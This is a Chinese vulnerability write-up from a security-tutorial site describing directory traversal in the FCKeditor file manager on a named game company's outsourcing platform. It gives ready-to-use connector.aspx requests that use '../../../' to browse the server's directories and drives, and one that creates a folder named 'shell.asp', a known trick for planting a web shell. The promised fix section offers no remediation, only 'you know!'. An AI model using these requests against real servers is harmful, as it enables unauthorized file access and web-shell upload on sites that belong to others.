手机
当前位置:查字典教程网 >网络安全 >漏洞分析 >盛大游戏外包管理平台FCK列全盘目路分析与解决方案
盛大游戏外包管理平台FCK列全盘目路分析与解决方案
摘要:修改CurrentFolder参数使用../../来进入不同的目录/browser/default/connectors/aspx/conn...

修改CurrentFolder 参数使用../../来进入不同的目录

/browser/default/connectors/aspx/connector.aspx?Command=CreateFolder&Type=Image&CurrentFolder=../../../&NewFolderName=shell.asp

根据返回的XML 信息可以查看网站所有的目录。

FCKeditor/editor/filemanager/browser/default/connectors/aspx/connector.aspx?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=/

也可以直接浏览盘符:

盛大游戏外包管理平台FCK列全盘目路分析与解决方案1

盛大游戏外包管理平台FCK列全盘目路分析与解决方案2

修复方案:

你懂的!

【盛大游戏外包管理平台FCK列全盘目路分析与解决方案】相关文章:

Belkin Wireless G Router绕过限制 拒绝服务漏洞

优酷资源管理系统V1.0的设计缺陷的分析与解决方案

新浪微博及招聘的两个XSS漏洞分析与解决方法

McAfee Framework存在远程格式串处理漏洞

PHP-Nuke 4nChat错误验证roomid参数 SQL注入漏洞

Mambo index.php文件多个跨站脚本执行漏洞

X.Org 存在X字体服务器多个内存破坏漏洞

又拍图片管家支付非法充值的漏洞分析及修复方法(图)

BitTorrent和uTorrent Peers 窗口缓冲区溢出漏洞

通过Dreamweaver挖掘脚本漏洞

精品推荐
分类导航